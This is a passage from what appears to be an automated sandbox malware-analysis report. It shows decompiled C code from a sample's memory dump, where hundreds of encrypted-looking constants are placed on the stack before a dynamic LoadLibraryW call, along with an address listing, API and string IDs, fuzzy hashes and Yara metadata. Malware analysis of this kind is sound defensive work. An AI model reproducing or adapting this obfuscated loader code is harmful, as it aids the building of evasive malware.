				_v756 = 0x58881b4d;
				_v752 = 0x7261191d;
				_v748 = 0xee6a2a6f;
				_v744 = 0x8b6ed692;
				_v740 = 0xf4ad89c5;
				_v736 = 0x902f328c;
				_v732 = 0xdae187c2;
				_v728 = 0x84c69aaf;
				_v724 = 0x8b583ddc;
				_v720 = 0x3154736a;
				_v716 = 0xf0ba94f8;
				_v712 = 0x371d3c0;
				_v708 = 0x9490ef0f;
				_v704 = 0x2d449fdf;
				_v700 = 0xb6d886dd;
				_v696 = 0x34ac4b5b;
				_v692 = 0x4add82f5;
				_v688 = 0x5643055a;
				_v684 = 0xedb6a896;
				_v680 = 0xf3b73e97;
				_v676 = 0xcd8bf45d;
				_v672 = 0x93a0ea35;
				_v668 = 0xf51d7bfd;
				_v664 = 0xd083f728;
				_v660 = 0x5978c810;
				_v656 = 0xacfb548d;
				_v652 = 0x681791b;
				_v648 = 0xab7f89b7;
				_v644 = 0x4f840277;
				_v640 = 0x45cf5527;
				_v636 = 0xafbc6fa5;
				_v632 = 0x7709f48f;
				_v628 = 0x8685cbd3;
				_v624 = 0x39eebbf5;
				_v620 = 0x5d1c8064;
				_v616 = 0x20fe1dce;
				_v612 = 0x69db75cc;
				_v608 = 0x9b65dc5a;
				_v604 = 0x27934866;
				_v600 = 0xf19b8bb6;
				_v596 = 0x887f0721;
				_v592 = 0x679fda8;
				_v588 = 0x78284a0;
				_v584 = 0x265fdb89;
				_v580 = 0x73ed0821;
				_v576 = 0x7d12f58b;
				_v572 = 0xc29cc904;
				_v568 = 0xf8cd14ad;
				_v564 = 0x5a59d9e2;
				_v560 = 0xa4ddcf31;
				_v556 = 0x91ce662e;
				_v552 = 0xc476dab;
				_v548 = 0xe8647b34;
				_v544 = 0x7a59bdcd;
				_v540 = 0xff29671e;
				_v536 = 0x37ab0d4d;
				_v532 = 0x3b7b2c58;
				_v528 = 0xdaca9837;
				_v524 = 0x5d95c73f;
				_v520 = 0x8d2d8ef2;
				_v516 = 0xe3a7eb3d;
				_v512 = 0x93410f8b;
				_v508 = 0x40690df9;
				_v504 = 0x56050e5c;
				_v500 = 0xdf7e7ef6;
				_v496 = 0xe57bff2d;
				_v492 = 0x8053dea3;
				_v488 = 0xca387b31;
				_v484 = 0x32eccb66;
				_v480 = 0xafb3b6b8;
				_v476 = 0x8f23f2d6;
				_v472 = 0x5fd00aa;
				_v468 = 0x7ba3d053;
				_v464 = 0xbed15460;
				_v460 = 0x91a7f84b;
				_v456 = 0x509deafe;
				_v452 = 0x8be07147;
				_v448 = 0x2a1903f7;
				_v444 = 0x74e13ee;
				_v440 = 0x46703439;
				_v436 = 0xf34281b8;
				_v432 = 0x88689edc;
				_v428 = 0xae06c319;
				_v424 = 0x809e0f7;
				_v420 = 0x32e2a63c;
				_v416 = 0x351aba4e;
				_v412 = 0x6bda9779;
				_v408 = 0xff25d6b;
				_v404 = 0xf19e2b12;
				_v400 = 0xe09ee902;
				_v396 = 0x30162918;
				_v392 = 0xf554291d;
				_v388 = 0xd293bf0c;
				_v384 = 0xa5aaa34d;
				_v380 = 0x18af0b32;
				_v376 = 0x45d3b443;
				_v372 = 0x8a8542bb;
				_v368 = 0xb2938f72;
				_v364 = 0x375b0514;
				_v360 = 0xa0175b99;
				_v356 = 0xab05d150;
				_v352 = 0xb2ab1a30;
				_v348 = 0xe6d1d6f1;
				_v344 = 0x5bc1d28d;
				_v340 = 0x31ab7862;
				_v336 = 0xb32f6993;
				_v332 = 0x3bff57b5;
				_v328 = 0xf4362081;
				_v324 = 0xa41ea41;
				_v320 = 0xf5554d12;
				_v316 = 0xe74be567;
				_v312 = 0xdda94f36;
				_v308 = 0x9942b8d7;
				_v304 = 0xa73018e6;
				_v300 = 0x65aa1921;
				_v296 = 0xa0ad1bda;
				_v292 = 0xfa54f506;
				_v288 = 0x36d533d2;
				_v284 = 0x2a17a738;
				_v280 = 0x24a73c55;
				_v276 = 0x25c6e7c;
				_v272 = 0x792542e6;
				_v268 = 0x60fe3e84;
				_v264 = 0xe894fa28;
				_v260 = 0xa8c3bd02;
				_v256 = 0xdec79a5c;
				_v252 = 0xaeea5367;
				_v248 = 0x9618cdf9;
				_v244 = 0x4d53bb98;
				_v240 = 0xc82415fb;
				_v236 = 0x311045a0;
				_v232 = 0x435d92ea;
				_v228 = 0x64d81a20;
				_v224 = 0x1a745c98;
				_v220 = 0xbb1cacab;
				_v216 = 0xb68b62f7;
				_v212 = 0x2262a170;
				_v208 = 0x244f7cd;
				_v204 = 0x634247e8;
				_v200 = 0x8e6f29ce;
				_v196 = 0xc125d02b;
				_v192 = 0xe1fb1246;
				_v188 = 0x90ff749d;
				_v184 = 0x9d49b7a9;
				_v180 = 0x8ae4cd18;
				_v176 = 0xdc3b0e33;
				_v172 = 0x5357343f;
				_v168 = 0x9078d775;
				_v164 = 0x7cd42af4;
				_v160 = 0x85875278;
				_v156 = 0xe098b691;
				_v152 = 0xdd539cbf;
				_v148 = 0x7b6915e6;
				_v144 = 0xdfa72c20;
				_v140 = 0x15af0b24;
				_v136 = 0x1e90183d;
				_v132 = 0xae2521d9;
				_v128 = 0x132fe8d2;
				_v124 = 0x7628aa01;
				_v120 = 0xf98981af;
				_v116 = 0xdeee782f;
				_v112 = 0x7ff5b8f;
				_v108 = 0x3a7c246a;
				_v104 = 0x8c6af67;
				_v100 = 0x27178fff;
				_v96 = 0x40ce6aac;
				_v92 = 0xe05cdea;
				_v88 = 0x1a09cd63;
				_v84 = 0x4ab557a2;
				_v80 = 0x578e6083;
				_v76 = 0x73ab4d0a;
				_v72 = 0x4577df03;
				_v68 = 0x388ee30c;
				_v64 = 0xa6a001f8;
				_v60 = 0xa362abb;
				_v56 = 0x4c361001;
				_v52 = 0x52b9ecf;
				_v48 = 0xf779ca4b;
				_v44 = 0xf0d67399;
				_v40 = 0x26e6d555;
				_v36 = 0xda742f2c;
				_v32 = 0x945c9d84;
				_v28 = 0x85b2d426;
				_v24 = 0x3e9987ee;
				_v20 = 0x9c588149;
				_v16 = 0x5b70fee9;
				_v12 = 0x724f6ac9;
				_v8 = 0x3e06e993;
				_t482 = E00401A52(0x412320, 0x72fc3a35);
				_t474 = LoadLibraryW(_t473); // executed
				 *0x4164ec = _t474;
				L00401B09(_t482);
				_push(0x414710);
				_push(0x81c5b25);
				return E004012FF( *0x4164ec,  &_v1888, 0x1d7);
			}



























































































































































































































































































































































































































































































                  0x004076d0
                  0x004076da
                  0x004076e4
                  0x004076ee
                  0x004076f8
                  0x00407702
                  0x0040770c
                  0x00407716
                  0x00407720
                  0x0040772a
                  0x00407734
                  0x0040773e
                  0x00407748
                  0x00407752
                  0x0040775c
                  0x00407766
                  0x00407770
                  0x0040777a
                  0x00407784
                  0x0040778e
                  0x00407798
                  0x004077a2
                  0x004077ac
                  0x004077b6
                  0x004077c0
                  0x004077ca
                  0x004077d4
                  0x004077de
                  0x004077e8
                  0x004077f2
                  0x004077fc
                  0x00407806
                  0x00407810
                  0x0040781a
                  0x00407824
                  0x0040782e
                  0x00407838
                  0x00407842
                  0x0040784c
                  0x00407856
                  0x00407860
                  0x0040786a
                  0x00407874
                  0x0040787e
                  0x00407888
                  0x00407892
                  0x0040789c
                  0x004078a6
                  0x004078b0
                  0x004078ba
                  0x004078c4
                  0x004078ce
                  0x004078d8
                  0x004078e2
                  0x004078ec
                  0x004078f6
                  0x00407900
                  0x0040790a
                  0x00407914
                  0x0040791e
                  0x00407928
                  0x00407932
                  0x0040793c
                  0x00407946
                  0x00407950
                  0x0040795a
                  0x00407964
                  0x0040796e
                  0x00407978
                  0x00407982
                  0x0040798c
                  0x00407996
                  0x004079a0
                  0x004079aa
                  0x004079b4
                  0x004079be
                  0x004079c8
                  0x004079d2
                  0x004079dc
                  0x004079e6
                  0x004079f0
                  0x004079fa
                  0x00407a04
                  0x00407a0e
                  0x00407a18
                  0x00407a22
                  0x00407a2c
                  0x00407a36
                  0x00407a40
                  0x00407a4a
                  0x00407a54
                  0x00407a5e
                  0x00407a68
                  0x00407a72
                  0x00407a7c
                  0x00407a86
                  0x00407a90
                  0x00407a9a
                  0x00407aa4
                  0x00407aae
                  0x00407ab8
                  0x00407ac2
                  0x00407acc
                  0x00407ad6
                  0x00407ae0
                  0x00407aea
                  0x00407af4
                  0x00407afe
                  0x00407b08
                  0x00407b12
                  0x00407b1c
                  0x00407b26
                  0x00407b30
                  0x00407b3a
                  0x00407b44
                  0x00407b4e
                  0x00407b58
                  0x00407b62
                  0x00407b6c
                  0x00407b76
                  0x00407b80
                  0x00407b8a
                  0x00407b94
                  0x00407b9e
                  0x00407ba8
                  0x00407bb2
                  0x00407bbc
                  0x00407bc6
                  0x00407bd0
                  0x00407bda
                  0x00407be4
                  0x00407bee
                  0x00407bf8
                  0x00407c02
                  0x00407c0c
                  0x00407c16
                  0x00407c20
                  0x00407c2a
                  0x00407c34
                  0x00407c3e
                  0x00407c48
                  0x00407c52
                  0x00407c5c
                  0x00407c66
                  0x00407c70
                  0x00407c7a
                  0x00407c84
                  0x00407c8e
                  0x00407c98
                  0x00407ca2
                  0x00407cac
                  0x00407cb6
                  0x00407cc0
                  0x00407cca
                  0x00407cd4
                  0x00407cde
                  0x00407ce8
                  0x00407cf2
                  0x00407cfc
                  0x00407d06
                  0x00407d10
                  0x00407d1a
                  0x00407d24
                  0x00407d2e
                  0x00407d38
                  0x00407d42
                  0x00407d4c
                  0x00407d56
                  0x00407d60
                  0x00407d6a
                  0x00407d74
                  0x00407d7e
                  0x00407d88
                  0x00407d92
                  0x00407d9c
                  0x00407da6
                  0x00407db0
                  0x00407dba
                  0x00407dc4
                  0x00407dce
                  0x00407dd8
                  0x00407de2
                  0x00407dec
                  0x00407df6
                  0x00407e00
                  0x00407e0a
                  0x00407e14
                  0x00407e1e
                  0x00407e28
                  0x00407e32
                  0x00407e3c
                  0x00407e46
                  0x00407e50
                  0x00407e5a
                  0x00407e64
                  0x00407e6e
                  0x00407e78
                  0x00407e82
                  0x00407e8c
                  0x00407e96
                  0x00407ea0
                  0x00407eaa
                  0x00407eb4
                  0x00407ebe
                  0x00407ec8
                  0x00407ed2
                  0x00407edc
                  0x00407ee6
                  0x00407ef0
                  0x00407efa
                  0x00407f04
                  0x00407f0e
                  0x00407f18
                  0x00407f22
                  0x00407f2c
                  0x00407f36
                  0x00407f40
                  0x00407f4a
                  0x00407f54
                  0x00407f5e
                  0x00407f68
                  0x00407f72
                  0x00407f7c
                  0x00407f86
                  0x00407f90
                  0x00407f9a
                  0x00407fa4
                  0x00407fae
                  0x00407fb8
                  0x00407fc2
                  0x00407fcc
                  0x00407fd6
                  0x00407fe0
                  0x00407fea
                  0x00407ff4
                  0x00407ffe
                  0x00408008
                  0x00408012
                  0x0040801c
                  0x00408026
                  0x00408030
                  0x0040803a
                  0x00408044
                  0x0040804e
                  0x00408058
                  0x00408062
                  0x0040806c
                  0x00408076
                  0x00408080
                  0x0040808a
                  0x00408094
                  0x0040809e
                  0x004080a8
                  0x004080b2
                  0x004080bc
                  0x004080c6
                  0x004080d0
                  0x004080da
                  0x004080e4
                  0x004080ee
                  0x004080f8
                  0x00408102
                  0x0040810c
                  0x00408116
                  0x00408120
                  0x0040812a
                  0x00408134
                  0x0040813e
                  0x00408148
                  0x00408152
                  0x0040815c
                  0x00408166
                  0x00408170
                  0x0040817a
                  0x00408184
                  0x0040818e
                  0x00408198
                  0x004081a2
                  0x004081ac
                  0x004081b6
                  0x004081c0
                  0x004081ca
                  0x004081d4
                  0x004081de
                  0x004081e8
                  0x004081f2
                  0x004081fc
                  0x00408206
                  0x00408210
                  0x0040821a
                  0x00408224
                  0x0040822e
                  0x00408238
                  0x00408242
                  0x0040824c
                  0x00408256
                  0x00408260
                  0x0040826a
                  0x00408274
                  0x0040827e
                  0x00408288
                  0x00408292
                  0x0040829c
                  0x004082a6
                  0x004082b0
                  0x004082ba
                  0x004082c4
                  0x004082ce
                  0x004082d8
                  0x004082e2
                  0x004082ec
                  0x004082f6
                  0x00408300
                  0x0040830a
                  0x00408314
                  0x0040831e
                  0x00408328
                  0x00408332
                  0x0040833c
                  0x00408346
                  0x00408350
                  0x0040835a
                  0x00408364
                  0x0040836e
                  0x00408378
                  0x00408382
                  0x0040838c
                  0x00408396
                  0x004083a0
                  0x004083aa
                  0x004083b4
                  0x004083be
                  0x004083c8
                  0x004083d2
                  0x004083dc
                  0x004083e6
                  0x004083f0
                  0x004083fa
                  0x00408404
                  0x0040840e
                  0x00408418
                  0x00408422
                  0x0040842c
                  0x00408436
                  0x00408440
                  0x0040844a
                  0x00408454
                  0x0040845e
                  0x00408468
                  0x00408472
                  0x0040847c
                  0x00408486
                  0x00408490
                  0x0040849a
                  0x004084a4
                  0x004084ae
                  0x004084b8
                  0x004084c2
                  0x004084cc
                  0x004084d6
                  0x004084e0
                  0x004084ea
                  0x004084f4
                  0x004084fe
                  0x00408508
                  0x00408512
                  0x0040851c
                  0x00408526
                  0x00408530
                  0x0040853a
                  0x00408544
                  0x0040854e
                  0x00408558
                  0x00408562
                  0x0040856c
                  0x00408576
                  0x00408580
                  0x0040858a
                  0x00408594
                  0x0040859e
                  0x004085a8
                  0x004085b2
                  0x004085bc
                  0x004085c6
                  0x004085d0
                  0x004085da
                  0x004085e4
                  0x004085ee
                  0x004085f8
                  0x00408602
                  0x0040860c
                  0x00408616
                  0x00408620
                  0x0040862a
                  0x00408634
                  0x0040863e
                  0x00408648
                  0x00408652
                  0x0040865c
                  0x00408666
                  0x00408670
                  0x0040867a
                  0x00408684
                  0x0040868e
                  0x0040869d
                  0x004086ac
                  0x004086b6
                  0x004086c0
                  0x004086ca
                  0x004086d4
                  0x004086de
                  0x004086e8
                  0x004086f2
                  0x004086fc
                  0x00408706
                  0x00408710
                  0x0040871a
                  0x00408724
                  0x0040872e
                  0x00408738
                  0x00408742
                  0x0040874c
                  0x00408756
                  0x00408760
                  0x0040876a
                  0x00408774
                  0x0040877e
                  0x00408788
                  0x00408792
                  0x0040879c
                  0x004087a6
                  0x004087b0
                  0x004087ba
                  0x004087c4
                  0x004087ce
                  0x004087d8
                  0x004087e2
                  0x004087ec
                  0x004087f6
                  0x00408800
                  0x00408807
                  0x0040880e
                  0x00408815
                  0x0040881c
                  0x00408823
                  0x0040882a
                  0x00408831
                  0x00408838
                  0x0040883f
                  0x00408846
                  0x0040884d
                  0x00408854
                  0x0040885b
                  0x00408862
                  0x00408869
                  0x00408870
                  0x00408877
                  0x0040887e
                  0x00408885
                  0x0040888c
                  0x00408893
                  0x0040889a
                  0x004088a1
                  0x004088a8
                  0x004088af
                  0x004088b6
                  0x004088bd
                  0x004088c4
                  0x004088cb
                  0x004088d2
                  0x004088d9
                  0x004088e5
                  0x004088e8
                  0x004088f0
                  0x004088f5
                  0x00408906
                  0x0040890b
                  0x00408921

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 004088E8
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: bB^$#B} $4{d$94pF$;.!-$;lbr$?4WS$AA$DaMs$N!Zy$R$.b$X,{;$gK$j$|:$jsT1$nf$o*j$|3`k$9e[$B%y$GBc
                  • API String ID: 1029625771-3166147023
                  • Opcode ID: dd96afa55d8e9e932a96e5fe82667a6c913e1731f0611b2d86c11fa43710962e
                  • Instruction ID: 7dcabeb444d3c38dde185443b52466955599dc9d20e08e1f97c3b9dafdfd80e0
                  • Opcode Fuzzy Hash: dd96afa55d8e9e932a96e5fe82667a6c913e1731f0611b2d86c11fa43710962e
                  • Instruction Fuzzy Hash: 9B82B4F0C467698FDB618F429E8438EBA75BB51345F5096C9C29C3A204CB750BC2CF89
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040632A, Relevance: 35.5, APIs: 1, Strings: 19, Instructions: 527libraryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E0040632A(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				intOrPtr _v476;
				intOrPtr _v480;
				intOrPtr _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				intOrPtr _v516;
				intOrPtr _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				intOrPtr _v708;
				intOrPtr _v712;
				intOrPtr _v716;
				intOrPtr _v720;
				intOrPtr _v724;
				intOrPtr _v728;
				intOrPtr _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				intOrPtr _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				intOrPtr _v760;
				intOrPtr _v764;
				intOrPtr _v768;
				intOrPtr _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v784;
				intOrPtr _v788;
				intOrPtr _v792;
				intOrPtr _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _v816;
				intOrPtr _v820;
				intOrPtr _v824;
				intOrPtr _v828;
				intOrPtr _v832;
				intOrPtr _v836;
				intOrPtr _v840;
				intOrPtr _v844;
				intOrPtr _v848;
				intOrPtr _v852;
				intOrPtr _v856;
				intOrPtr _v860;
				intOrPtr _v864;
				intOrPtr _v868;
				intOrPtr _v872;
				intOrPtr _v876;
				intOrPtr _v880;
				intOrPtr _v884;
				intOrPtr _v888;
				intOrPtr _v892;
				intOrPtr _v896;
				intOrPtr _v900;
				intOrPtr _v904;
				intOrPtr _v908;
				intOrPtr _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				intOrPtr _v924;
				intOrPtr _v928;
				intOrPtr _v932;
				intOrPtr _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				intOrPtr _v952;
				intOrPtr _v956;
				intOrPtr _v960;
				intOrPtr _v964;
				intOrPtr _v968;
				intOrPtr _v972;
				intOrPtr _v976;
				intOrPtr _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				intOrPtr _v992;
				intOrPtr _v996;
				intOrPtr _v1000;
				intOrPtr _v1004;
				intOrPtr _v1008;
				intOrPtr _v1012;
				intOrPtr _v1016;
				intOrPtr _v1020;
				intOrPtr _v1024;
				intOrPtr _v1028;
				intOrPtr _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				intOrPtr _v1060;
				intOrPtr _v1064;
				intOrPtr _v1068;
				intOrPtr _v1072;
				intOrPtr _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				intOrPtr _v1144;
				intOrPtr _v1148;
				intOrPtr _v1152;
				intOrPtr _v1156;
				intOrPtr _v1160;
				intOrPtr _v1164;
				intOrPtr _v1168;
				intOrPtr _v1172;
				intOrPtr _v1176;
				intOrPtr _v1180;
				intOrPtr _v1184;
				intOrPtr _v1188;
				intOrPtr _v1192;
				intOrPtr _v1196;
				intOrPtr _v1200;
				intOrPtr _v1204;
				intOrPtr _v1208;
				intOrPtr _v1212;
				intOrPtr _v1216;
				intOrPtr _v1220;
				intOrPtr _v1224;
				intOrPtr _v1228;
				intOrPtr _v1232;
				intOrPtr _v1236;
				intOrPtr _v1240;
				intOrPtr _v1244;
				intOrPtr _v1248;
				intOrPtr _v1252;
				intOrPtr _v1256;
				intOrPtr _v1260;
				intOrPtr _v1264;
				intOrPtr _v1268;
				intOrPtr _v1272;
				intOrPtr _v1276;
				intOrPtr _v1280;
				intOrPtr _v1284;
				intOrPtr _v1288;
				intOrPtr _v1292;
				intOrPtr _v1296;
				intOrPtr _v1300;
				intOrPtr _v1304;
				intOrPtr _v1308;
				intOrPtr _v1312;
				intOrPtr _v1316;
				intOrPtr _v1320;
				intOrPtr _v1324;
				intOrPtr _v1328;
				intOrPtr _v1332;
				intOrPtr _v1336;
				intOrPtr _v1340;
				intOrPtr _v1344;
				intOrPtr _v1348;
				intOrPtr _v1352;
				intOrPtr _v1356;
				intOrPtr _v1360;
				intOrPtr _v1364;
				intOrPtr _v1368;
				intOrPtr _v1372;
				intOrPtr _v1376;
				intOrPtr _v1380;
				intOrPtr _v1384;
				intOrPtr _v1388;
				intOrPtr _v1392;
				intOrPtr _v1396;
				intOrPtr _v1400;
				intOrPtr _v1404;
				intOrPtr _v1408;
				intOrPtr _v1412;
				intOrPtr _v1416;
				intOrPtr _v1420;
				intOrPtr _v1424;
				intOrPtr _v1428;
				intOrPtr _v1432;
				intOrPtr _v1436;
				intOrPtr _v1440;
				intOrPtr _v1444;
				intOrPtr _v1448;
				intOrPtr _v1452;
				intOrPtr _v1456;
				intOrPtr _v1460;
				intOrPtr _v1464;
				intOrPtr _v1468;
				intOrPtr _v1472;
				intOrPtr _v1476;
				intOrPtr _v1480;
				intOrPtr _v1484;
				intOrPtr _v1488;
				intOrPtr _v1492;
				intOrPtr _v1496;
				intOrPtr _v1500;
				intOrPtr _v1504;
				intOrPtr _v1508;
				intOrPtr _v1512;
				intOrPtr _v1516;
				intOrPtr _v1520;
				intOrPtr _v1524;
				intOrPtr _v1528;
				intOrPtr _v1532;
				intOrPtr _v1536;
				intOrPtr _v1540;
				intOrPtr _v1544;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				intOrPtr _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				intOrPtr _v1676;
				intOrPtr _v1680;
				intOrPtr _v1684;
				intOrPtr _v1688;
				intOrPtr _v1692;
				intOrPtr _v1696;
				intOrPtr _v1700;
				intOrPtr _v1704;
				intOrPtr _v1708;
				intOrPtr _v1712;
				intOrPtr _v1716;
				intOrPtr _v1720;
				intOrPtr _v1724;
				intOrPtr _v1728;
				intOrPtr _v1732;
				intOrPtr _v1736;
				intOrPtr _v1740;
				intOrPtr _v1744;
				intOrPtr _v1748;
				intOrPtr _v1752;
				intOrPtr _v1756;
				intOrPtr _v1760;
				intOrPtr _v1764;
				intOrPtr _v1768;
				intOrPtr _v1772;
				intOrPtr _v1776;
				intOrPtr _v1780;
				intOrPtr _v1784;
				intOrPtr _v1788;
				intOrPtr _v1792;
				intOrPtr _v1796;
				intOrPtr _v1800;
				intOrPtr _v1804;
				intOrPtr _v1808;
				intOrPtr _v1812;
				intOrPtr _v1816;
				intOrPtr _v1820;
				intOrPtr _v1824;
				intOrPtr _v1828;
				intOrPtr _v1832;
				intOrPtr _v1836;
				intOrPtr _v1840;
				intOrPtr _v1844;
				intOrPtr _v1848;
				intOrPtr _v1852;
				intOrPtr _v1856;
				intOrPtr _v1860;
				intOrPtr _v1864;
				intOrPtr _v1868;
				intOrPtr _v1872;
				intOrPtr _v1876;
				intOrPtr _v1880;
				intOrPtr _v1884;
				intOrPtr _v1888;
				intOrPtr _v1892;
				intOrPtr _v1896;
				intOrPtr _v1900;
				intOrPtr _v1904;
				intOrPtr _v1908;
				intOrPtr _v1912;
				intOrPtr _v1916;
				intOrPtr _v1920;
				intOrPtr _v1924;
				intOrPtr _v1928;
				intOrPtr _v1932;
				intOrPtr _v1936;
				intOrPtr _v1940;
				intOrPtr _v1944;
				intOrPtr _v1948;
				intOrPtr _v1952;
				intOrPtr _v1956;
				intOrPtr _v1960;
				intOrPtr _v1964;
				intOrPtr _v1968;
				intOrPtr _v1972;
				intOrPtr _v1976;
				intOrPtr _v1980;
				intOrPtr _v1984;
				intOrPtr _v1988;
				intOrPtr _v1992;
				intOrPtr _v1996;
				intOrPtr _v2000;
				intOrPtr _v2004;
				intOrPtr _v2008;
				intOrPtr _v2012;
				char _v2016;
				struct HINSTANCE__* _t506;

				_v2016 = 0x18cc9019;
				_v2012 = 0xfc13bd0b;
				_v2008 = 0xd3055123;
				_v2004 = 0xfefbe9e2;
				_v2000 = 0x33514f2d;
				_v1996 = 0x3a9ec3b2;
				_v1992 = 0x4e73ef30;
				_v1988 = 0x5297271a;
				_v1984 = 0x2617a6ff;
				_v1980 = 0xd827466e;
				_v1976 = 0x7b1d390a;
				_v1972 = 0xcd18d019;
				_v1968 = 0x21d65d43;
				_v1964 = 0x3934b95;
				_v1960 = 0xa4200f47;
				_v1956 = 0x701eb724;
				_v1952 = 0xa10f78fe;
				_v1948 = 0xc30a8a91;
				_v1944 = 0xafee2c35;
				_v1940 = 0x2014674f;
				_v1936 = 0x82b976a7;
				_v1932 = 0xf8d1ef8c;
				_v1928 = 0xaf5f6f2a;
				_v1924 = 0x6d7bb63;
				_v1920 = 0x2c5506c;
				_v1916 = 0x57d61a32;
				_v1912 = 0xa54bb9df;
				_v1908 = 0x29098018;
				_v1904 = 0x9689a1a3;
